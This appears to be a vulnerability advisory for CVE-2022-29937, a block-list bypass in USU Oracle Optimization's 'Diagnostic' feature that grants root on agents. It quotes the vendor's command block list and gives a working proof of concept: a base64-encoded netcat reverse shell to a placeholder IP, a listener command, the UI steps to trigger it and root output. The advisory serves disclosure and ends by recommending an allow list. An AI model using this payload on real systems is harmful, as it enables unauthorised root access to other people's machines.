Headline
CVE-2022-29937: Build software better, together
USU Oracle Optimization before 5.17.5 allows authenticated DataCollection users to achieve agent root access because some common OS commands are blocked but (for example) an OS command for base64 decoding is not blocked. NOTE: this is not an Oracle Corporation product.
A bypass allows to execute any commands on agents using “Diagnostic” feature.
A user with “DataCollection” profile can launch from the server any shell command as root on agents.
“Diagnostic” feature allows to run shell commands. These commands are run on agents as root.
The following block list is implemented in order to prevent arbitrary execution.
"rm", "kill", "mkfs", "reboot", "vi", "vim", "mv", "poweroff", "shred", "mount", "umount", "shutdown", "dd", "init", "touch", "chmod", "curl", "history", "id", "last", "nano", "password", "sshd", "useradd", "userdel", "wget"
This block list can be trivially bypassed.
This proof of concept demonstrate the possibility to establish reverse shell on an agent.
$ echo "nc -e /bin/bash <your ip> 4444" | base64
bmMgLWUgL2Jpbi9i<REDACTED>
Then launch a TCP listner on you machine.
$ nc -vnl 4444
Listening on 0.0.0.0 4444
On the web interface select following tab:
“Data collection” -> “Collectors management” -> “Batch operations”
Select an agent and create an new batch operation. Select "Diagnostic".
You should receive an incoming connection on the TCP listener.
Connection Received on <REDACTED>
id
uid=0(root) gid=0(root) groups=0(root)
We recommend to use an allow list approach.